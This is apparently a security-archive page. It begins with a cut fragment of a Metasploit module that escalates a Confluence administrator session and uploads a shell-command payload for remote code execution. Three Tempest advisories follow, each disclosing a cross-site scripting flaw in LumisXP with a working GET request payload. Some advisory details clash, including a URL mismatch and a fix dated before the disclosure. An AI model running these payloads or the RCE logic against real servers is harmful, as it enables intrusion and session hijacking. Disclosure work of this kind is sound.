send_request_cgi(      'method' => 'GET',      'keep_cookies' => 'true',      'uri' => normalize_uri(target_uri.path, 'admin', 'console.action')    )    # Connection failure, no response, or malformed response.    fail_with(Failure::Unknown, 'Target did not respond as expected during privilege check') unless res_check_admin    # If a 'Location' header is returned in the response, the current session doesn't have full privileges.    if res_check_admin.headers['Location']      # Confluence will redirect to the login page if the current user does not have admin privileges, so check for that here.      if res_check_admin.headers['Location'].include?('login.action')        fail_with(Failure::BadConfig, 'The provided credentials are valid, but the user does not have administrative privileges')      end      vprint_status('The provided user is an administrator')      # Check whether Secure Administrator Sessions feature (sudo-like elevation prompt) is enabled. This feature is default on newer versions.      if res_check_admin.headers['Location'].include?('authenticate.action')        elevate      end    # User is an administrator and Secure Administrator Sessions is disabled.    else      vprint_status('The provided user is an administrator')    end    # As an administrator, check the host OS for selection between sh/cmd.exe in payload    shell = get_host_os == 'win' ? '"cmd.exe", "/c"' : '"/bin/sh", "-c"'    # Upload a text file containing a payload to be evaluated by the script engine    upload_payload(shell)  endend

Atlassian Confluence Administrator Code Macro Remote Code Execution

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in XsltResultControllerHtml.jsp.

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: A cross-site scripting (XSS) vulnerability in the  
component XsltResultControllerHtml.jsp of Lumisxp v15.0.x to v16.1.x allows  
attackers to execute arbitrary web scripts or HTML via a crafted payload  
injected into the lumPageID parameter

=====[ Detailed  
description]=================================================  
* XSS [GET  
/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=]:

1 - Send the link by inserting the XSS payload into the lumPageID=  
parameter.

```  
GET  
/portal/XsltResultControllerHtml.jsp?xslContent=&interfaceInstanceId=&lumPageId=%3cscript%3econfirm(1)%3c%2fscript%3e&xslContentFilePath=  
```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33326

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================  
--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

LumisXP 16.1.x Cross Site Scripting

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in UrlAccessibilityEvaluation.jsp.

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: Lumisxp versions 15.0.x to 16.1.x have an unauthenticated  
XSS vulnerability in the UrlAccessibilityEvaluation.jsp page, specifically  
in the contentHtml parameter.

=====[ Detailed  
description]=================================================  
* XSS [GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
]:

1 - Send the link by inserting the XSS payload into the contentHtml=  
parameter.

```  
GET  
/lumis/service/htmlevaluation/UrlAccessibilityEvaluation.jsp?contentHtml=%3cp%3e%3ci%20id%3d%22run-code-button%22%20lang%3d%22xml%22%20title%3d%22Run%20Code%20and%20See%20Output%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3cp%3e%3ci%20title%3d%22Light%20Mode%22%3e%3c%2fi%3e%3c%2fp%3e%0a%0a%3ctable%20border%3d%220%22%20cellpadding%3d%220%22%20cellspacing%3d%220mmdfn%26lt%3bscript%26gt%3balert(1)%26lt%3b%2fscript%26gt

```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33327

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

LumisXP versions 15.0.x through 16.1.x suffer from a cross site scripting vulnerability in main.jsp

=====[ Tempest Security Intelligence - ADV-6/2024  
]==========================

LumisXP v15.0.x to v16.1.x

Author: Rodolfo Tavares

Tempest Security Intelligence - Recife, Pernambuco - Brazil

=====[ Table of Contents]==================================================  
 * Overview  
 * Detailed description  
 * Timeline of disclosure  
 * Thanks & Acknowledgements  
 * References

=====[ Vulnerability  
Information]=============================================  
 * Class: Improper Neutralization of Input During Web Page Generation  
('Cross-site Scripting')  
 ('Improper Neutralization of Input During Web Page Generation ('Cross-site  
Scripting')') [CWE-79]

 * CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N - 5.4

=====[ Overview]========================================================  
 * System affected : LumisXP  
 * Software Version : Version - v15.0.x to v16.1.x  
 * Impacts :  
 * Vulnerability: A cross-site scripting (XSS) vulnerability in the  
component main.jsp of Lumisxp v15.0.x to v16.1.x allows attackers to  
execute arbitrary web scripts or HTML via a crafted payload injected into  
the pageId parameter.

=====[ Detailed  
description]=================================================  
* XSS [GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
]:

1 - Send the link by inserting the XSS payload into the pageId= parameter.

```  
GET  
/main.jsp?lumChannelId=00000000F00000000000000000000002&lumPageId=LumisBlankPage&lumRTI=lumis.service.doui.selectstructureelement.selectPage&pageId=%22%2c%20print()%2c%0d%22aaa  
```  
2 - Verify that in the response your payload will be executed.

=====[ Timeline of  
disclosure]===============================================

 2/Apr/2024 - Responsible disclosure was initiated with the vendor.  
 12/Apr/2024 - LumisXP Support confirmed the issue;  
 16/Fev/2024 - The vendor fixed the vulnerability  
 29/May/2024 - CVEs was assigned and reserved as CVE-2024-33328

=====[ Thanks & Acknowledgements]========================================  
 * Tempest Security Intelligence [1]  
 * Rodolfo Tavares  
 * Niklas Correa

=====[ References ]=====================================================

 [1][ [https://cwe.mitre.org/data/definitions/79.html]  
 [2][ [https://www.tempest.com.br|https://www.tempest.com.br/]]  
 [3][Thanks Filipe X.]

=====[ EOF ]===========================================================

--

-- 

*Esta mensagem é para uso exclusivo de seu destinatário e pode conter   
informações privilegiadas e confidenciais. Todas as informações aqui   
contidas devem ser tratadas como confidenciais e não devem ser divulgadas a   
terceiros sem o prévio consentimento por escrito da Tempest. Se você não é   
o destinatário não deve distribuir, copiar ou arquivar a mensagem. Neste   
caso, por favor, notifique o remetente da mesma e destrua imediatamente a   
mensagem.*

*  
*  
*This message is intended solely for the use of its   
addressee and may contain privileged or confidential information. All   
information contained herein shall be treated as confidential and shall not   
be disclosed to any third party without Tempest’s prior written approval.   
If you are not the addressee you should not distribute, copy or file this   
message. In this case, please notify the sender and destroy its contents   
immediately.**  
*  
*  
*

Tag

#web